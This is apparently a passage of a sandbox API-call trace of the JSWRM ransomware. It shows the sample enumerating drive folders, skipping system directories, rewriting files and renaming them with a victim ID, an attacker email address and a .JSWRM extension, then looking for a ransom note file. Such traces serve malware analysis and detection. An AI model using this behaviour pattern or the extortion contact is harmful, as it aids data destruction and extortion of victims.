lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0058.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d458, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0058.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0058.553] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0058.553] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0058.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c6f0 [0058.553] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x2268b0 [0058.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c6f0 | out: hHeap=0x1e0000) returned 1 [0058.554] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2363b0 [0058.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2268b0 | out: hHeap=0x1e0000) returned 1 [0058.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.554] MoveFileW (lpExistingFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd"), lpNewFileName="C:\\$GetCurrent\\SafeOS\\preoobe.cmd.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\$getcurrent\\safeos\\preoobe.cmd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0058.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2363b0 | out: hHeap=0x1e0000) returned 1 [0058.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bf60 | out: hHeap=0x1e0000) returned 1 [0058.554] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0058.554] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x60002, dwReserved1=0x22d286, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 1 [0058.554] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2=".") returned 1 [0058.554] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="..") returned 1 [0058.554] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="...") returned 1 [0058.554] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="windows") returned -1 [0058.554] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="recovery") returned 1 [0058.554] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="perflogs") returned 1 [0058.554] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="documents and settings") returned 1 [0058.554] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="$RECYCLE.BIN") returned 1 [0058.555] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="system volume information") returned -1 [0058.555] lstrcmpiW (lpString1="SetupComplete.cmd", lpString2="msocache") returned 1 [0058.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupComplete.cmd", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0058.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupComplete.cmd", cchWideChar=17, lpMultiByteStr=0x241358, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupComplete.cmd", lpUsedDefaultChar=0x0) returned 17 [0058.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d458 [0058.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupComplete.cmd", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0058.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241290 [0058.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="SetupComplete.cmd", cchWideChar=17, lpMultiByteStr=0x241290, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SetupComplete.cmd", lpUsedDefaultChar=0x0) returned 17 [0058.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d458 | out: hHeap=0x1e0000) returned 1 [0058.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c380 [0058.555] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0058.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.555] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345f334, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.555] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0058.555] CreateFileW (lpFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d4 [0058.556] GetFileSizeEx (in: hFile=0x3d4, lpFileSize=0x345f2c8 | out: lpFileSize=0x345f2c8*=307) returned 1 [0058.556] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.556] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x21b710 [0058.556] ReadFile (in: hFile=0x3d4, lpBuffer=0x21b710, nNumberOfBytesToRead=0x130, lpNumberOfBytesRead=0x345f2d4, lpOverlapped=0x0 | out: lpBuffer=0x21b710*, lpNumberOfBytesRead=0x345f2d4*=0x130, lpOverlapped=0x0) returned 1 [0058.557] SetFilePointer (in: hFile=0x3d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.557] WriteFile (in: hFile=0x3d4, lpBuffer=0x21b710*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x345f2d0, lpOverlapped=0x0 | out: lpBuffer=0x21b710*, lpNumberOfBytesWritten=0x345f2d0*=0x130, lpOverlapped=0x0) returned 1 [0058.557] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21b710 | out: hHeap=0x1e0000) returned 1 [0058.557] CloseHandle (hObject=0x3d4) returned 1 [0058.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c590 [0058.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0058.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d490 [0058.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d490, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0058.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d4c8 [0058.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d490 | out: hHeap=0x1e0000) returned 1 [0058.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0058.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0058.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0058.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232e20 [0058.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0058.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e20 | out: hHeap=0x1e0000) returned 1 [0058.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd4) returned 0x1fc808 [0058.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0058.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d4c8 | out: hHeap=0x1e0000) returned 1 [0058.559] MoveFileW (lpExistingFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd"), lpNewFileName="C:\\$GetCurrent\\SafeOS\\SetupComplete.cmd.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\$getcurrent\\safeos\\setupcomplete.cmd.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0058.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0058.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c590 | out: hHeap=0x1e0000) returned 1 [0058.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0058.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0058.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0058.559] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345f360 | out: lpFindFileData=0x345f360*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x957833a7, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x957833a7, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x9578472e, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x133, dwReserved0=0x60002, dwReserved1=0x22d286, cFileName="SetupComplete.cmd", cAlternateFileName="SETUPC~1.CMD")) returned 0 [0058.559] FindClose (in: hFindFile=0x231dc0 | out: hFindFile=0x231dc0) returned 1 [0058.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c380 | out: hHeap=0x1e0000) returned 1 [0058.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0058.559] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0058.559] FindNextFileW (in: hFindFile=0x2320c0, lpFindFileData=0x345f6c8 | out: lpFindFileData=0x345f6c8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1f6726, cFileName="SafeOS", cAlternateFileName="")) returned 0 [0058.559] FindClose (in: hFindFile=0x2320c0 | out: hFindFile=0x2320c0) returned 1 [0058.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0058.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0058.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0058.560] FindNextFileW (in: hFindFile=0x231d80, lpFindFileData=0x345fa30 | out: lpFindFileData=0x345fa30*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbaec25, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xae73cae3, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xae73cae3, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$Recycle.Bin", cAlternateFileName="")) returned 1 [0058.560] lstrcmpiW (lpString1="$Recycle.Bin", lpString2=".") returned -1 [0058.560] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="..") returned -1 [0058.560] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="...") returned -1 [0058.560] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="windows") returned -1 [0058.560] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="recovery") returned -1 [0058.560] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="perflogs") returned -1 [0058.560] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="documents and settings") returned -1 [0058.560] lstrcmpiW (lpString1="$Recycle.Bin", lpString2="$RECYCLE.BIN") returned 0 [0058.560] FindNextFileW (in: hFindFile=0x231d80, lpFindFileData=0x345fa30 | out: lpFindFileData=0x345fa30*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x85776261, ftCreationTime.dwHighDateTime=0x1d3276f, ftLastAccessTime.dwLowDateTime=0x85776261, ftLastAccessTime.dwHighDateTime=0x1d3276f, ftLastWriteTime.dwLowDateTime=0x85776261, ftLastWriteTime.dwHighDateTime=0x1d3276f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$WINRE_BACKUP_PARTITION.MARKER", cAlternateFileName="$WINRE~1.MAR")) returned 1 [0058.560] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2=".") returned -1 [0058.560] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="..") returned -1 [0058.560] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="...") returned -1 [0058.560] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="windows") returned -1 [0058.560] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="recovery") returned -1 [0058.560] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="perflogs") returned -1 [0058.560] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="documents and settings") returned -1 [0058.560] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="$RECYCLE.BIN") returned 1 [0058.560] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="system volume information") returned -1 [0058.560] lstrcmpiW (lpString1="$WINRE_BACKUP_PARTITION.MARKER", lpString2="msocache") returned -1 [0058.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="$WINRE_BACKUP_PARTITION.MARKER", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0058.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0058.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="$WINRE_BACKUP_PARTITION.MARKER", cchWideChar=30, lpMultiByteStr=0x241268, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="$WINRE_BACKUP_PARTITION.MARKER", lpUsedDefaultChar=0x0) returned 30 [0058.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="$WINRE_BACKUP_PARTITION.MARKER", cchWideChar=30, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0058.560] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0058.560] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="$WINRE_BACKUP_PARTITION.MARKER", cchWideChar=30, lpMultiByteStr=0x240fc0, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="$WINRE_BACKUP_PARTITION.MARKER", lpUsedDefaultChar=0x0) returned 30 [0058.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22beb0 [0058.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0058.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345fa04, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7f8 [0058.561] CreateFileW (lpFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x44c [0058.561] GetFileSizeEx (in: hFile=0x44c, lpFileSize=0x345f998 | out: lpFileSize=0x345f998*=0) returned 1 [0058.561] SetFilePointer (in: hFile=0x44c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1) returned 0x23b928 [0058.562] ReadFile (in: hFile=0x44c, lpBuffer=0x23b928, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x345f9a4, lpOverlapped=0x0 | out: lpBuffer=0x23b928*, lpNumberOfBytesRead=0x345f9a4*=0x0, lpOverlapped=0x0) returned 1 [0058.562] SetFilePointer (in: hFile=0x44c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0058.562] WriteFile (in: hFile=0x44c, lpBuffer=0x23b928*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x345f9a0, lpOverlapped=0x0 | out: lpBuffer=0x23b928*, lpNumberOfBytesWritten=0x345f9a0*=0x0, lpOverlapped=0x0) returned 1 [0058.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b928 | out: hHeap=0x1e0000) returned 1 [0058.562] CloseHandle (hObject=0x44c) returned 1 [0058.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c7a0 [0058.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0058.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0058.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0058.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0058.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0058.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0058.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0058.562] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0058.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0058.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c538 [0058.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x76) returned 0x225e30 [0058.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c538 | out: hHeap=0x1e0000) returned 1 [0058.562] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0058.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225e30 | out: hHeap=0x1e0000) returned 1 [0058.562] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0058.562] MoveFileW (lpExistingFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER" (normalized: "c:\\$winre_backup_partition.marker"), lpNewFileName="C:\\$WINRE_BACKUP_PARTITION.MARKER.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\$winre_backup_partition.marker.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0058.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0058.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0058.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7f8 | out: hHeap=0x1e0000) returned 1 [0058.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0058.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0058.563] FindNextFileW (in: hFindFile=0x231d80, lpFindFileData=0x345fa30 | out: lpFindFileData=0x345fa30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf257ded5, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf39a4e7e, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf74cd515, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="588bce7c90097ed212", cAlternateFileName="588BCE~1")) returned 1 [0058.563] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2=".") returned 1 [0058.563] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="..") returned 1 [0058.563] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="...") returned 1 [0058.563] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="windows") returned -1 [0058.563] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="recovery") returned -1 [0058.563] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="perflogs") returned -1 [0058.563] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="documents and settings") returned -1 [0058.563] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="$RECYCLE.BIN") returned 1 [0058.563] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="system volume information") returned -1 [0058.563] lstrcmpiW (lpString1="588bce7c90097ed212", lpString2="msocache") returned -1 [0058.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0058.563] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22beb0 | out: hHeap=0x1e0000) returned 1 [0058.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0058.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0058.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5e) returned 0x232c18 [0058.564] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0058.564] GetFileAttributesW (lpFileName="C:\\588bce7c90097ed212\\JSWRM-DECRYPT.hta" (normalized: "c:\\588bce7c90097ed212\\jswrm-decrypt.hta")) returned 0xffffffff [0058.566] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c18 | out: hHeap=0x1e0000) returned 1 [0058.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0058.566] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345c894, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0058.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0058.566] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x23bc78 [0058.566] HeapFree (in: hHeap=0x1e0000, 